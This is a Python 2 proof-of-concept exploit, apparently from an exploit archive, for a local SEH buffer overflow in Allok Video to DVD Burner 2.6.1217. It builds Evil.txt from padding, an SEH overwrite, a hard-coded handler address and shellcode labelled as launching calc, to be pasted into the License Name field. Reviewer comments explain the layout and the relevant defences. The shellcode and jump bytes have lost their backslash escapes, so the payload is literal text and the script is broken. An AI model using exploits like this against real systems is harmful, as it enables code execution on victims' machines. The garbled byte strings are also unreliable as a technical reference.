#######################################################
# Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_dvdburner.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok Video to DVD Burner 2.6.1217
# Tested on: Windows 7 SP1 x86
# Hello subinacls !
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################

# Reproduction steps supplied by the advisory author, echoed on every run.
# A single parenthesised argument prints the same text under the Python 2.7
# interpreter that step 2 calls for.
_steps = """
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """
print(_steps)

import struct

# Build the proof-of-concept input described in the header and write it to
# Evil.txt in the current directory. Python 2 only: the script uses the print
# statement and writes a str to a file opened in binary mode.
#
# Layout of the generated data, in order:
#   junk | nseh | seh | nop | buf | "T" padding up to `buffer` characters
#
# NOTE(review): the header classifies this as an SEH overwrite reached through
# the License Name field, which implies the field is copied without a length
# check -- presumably the vendor-side fix is bounding that input; SafeSEH/SEHOP,
# DEP and ASLR are the host-side controls relevant to this bug class.
#
# NOTE(review): the string literals on this page carry no backslashes, so
# Python reads them as plain ASCII text; every length computed below follows
# from the text exactly as printed here.

# Output file, truncated on open. The name `file` shadows the Python 2 builtin.
file = open("Evil.txt","wb")
# Total length the output is padded to.
buffer = 4000
# 780 filler characters placed ahead of the exception-handler record.
# presumably the distance to that record on the tested build (Windows 7 SP1
# x86, per the header) -- TODO confirm
junk = "A" * 780
# Field written immediately before the handler value (the "next SEH" slot in
# the header's terminology).
nseh = "x90x90xebx10"
# 0x10019A09 packed as a little-endian unsigned 32-bit value ("<L").
# NOTE(review): a hard-coded handler address only holds where the containing
# module loads at a fixed base; presumably it points into a module built
# without SafeSEH/ASLR -- verify against the installed binaries.
seh = struct.pack("<L",0x10019A09)
# Padding between the handler value and the payload: the literal repeated 20 times.
nop = "x90" * 20

# Shellcode Calc.exe
# (author's label; the payload contents are not verified here)

buf = ""
buf +="xbaxd5x31x08x38xdbxcbxd9x74x24xf4x5bx29xc9xb1"
buf +="x33x83xc3x04x31x53x0ex03x86x3fxeaxcdxd4xa8x63"
buf +="x2dx24x29x14xa7xc1x18x06xd3x82x09x96x97xc6xa1"
buf +="x5dxf5xf2x32x13xd2xf5xf3x9ex04x38x03x2fx89x96"
buf +="xc7x31x75xe4x1bx92x44x27x6exd3x81x55x81x81x5a"
buf +="x12x30x36xeex66x89x37x20xedxb1x4fx45x31x45xfa"
buf +="x44x61xf6x71x0ex99x7cxddxafx98x51x3dx93xd3xde"
buf +="xf6x67xe2x36xc7x88xd5x76x84xb6xdax7axd4xffxdc"
buf +="x64xa3x0bx1fx18xb4xcfx62xc6x31xd2xc4x8dxe2x36"
buf +="xf5x42x74xbcxf9x2fxf2x9ax1dxb1xd7x90x19x3axd6"
buf +="x76xa8x78xfdx52xf1xdbx9cxc3x5fx8dxa1x14x07x72"
buf +="x04x5exa5x67x3ex3dxa3x76xb2x3bx8ax79xccx43xbc"
buf +="x11xfdxc8x53x65x02x1bx10x99x48x06x30x32x15xd2"
buf +="x01x5fxa6x08x45x66x25xb9x35x9dx35xc8x30xd9xf1"
buf +="x20x48x72x94x46xffx73xbdx24x9exe7x5dx85x05x80"
buf +="xc4xd9"
# Concatenate the parts in the order given in the layout comment above.
exploit = junk + nseh + seh + nop + buf
# Characters still needed to reach `buffer`; if `exploit` were already longer,
# this goes negative and the "T" * fillers below yields an empty string.
fillers = buffer - len(exploit)
# Final content: the assembled parts followed by "T" padding.
crush = exploit + "T" * fillers
# Python 2 print statement (a syntax error under Python 3).
print "[+] Crush Me"
# No try/finally or `with`: if write() raises, the handle is never closed.
file.write(crush)
file.close()